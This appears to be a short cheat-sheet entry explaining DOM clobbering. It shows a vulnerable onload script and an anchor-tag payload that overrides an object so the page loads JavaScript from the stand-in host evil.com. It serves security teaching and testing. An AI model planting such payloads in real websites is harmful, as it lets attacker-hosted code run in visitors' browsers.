# DOM Cloberring

### Basic Exploitation <a href="#basic-exploitation" id="basic-exploitation"></a>

If the website adds the JavaScript code into the DOM when loading page as below,

```shellscript
window.onload = function() {
    let someObj = window.someObj || {};
    let script = document.createElement('script');
    script.src = someObj.url;
    document.body.appendChild(script);
}
```

We may manipulate this **`someObj`** and override the properties (**`url`** here) using **`anchor`** elements, then we can execute arbitrary JavaScript code.\
For example, insert the following code in the comment, search, etc. in the target website.

```
<a id=someObj><a id=someObj name=url href=//evil.com/exploit.js>
```

### References <a href="#references" id="references"></a>

* [DOM Clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)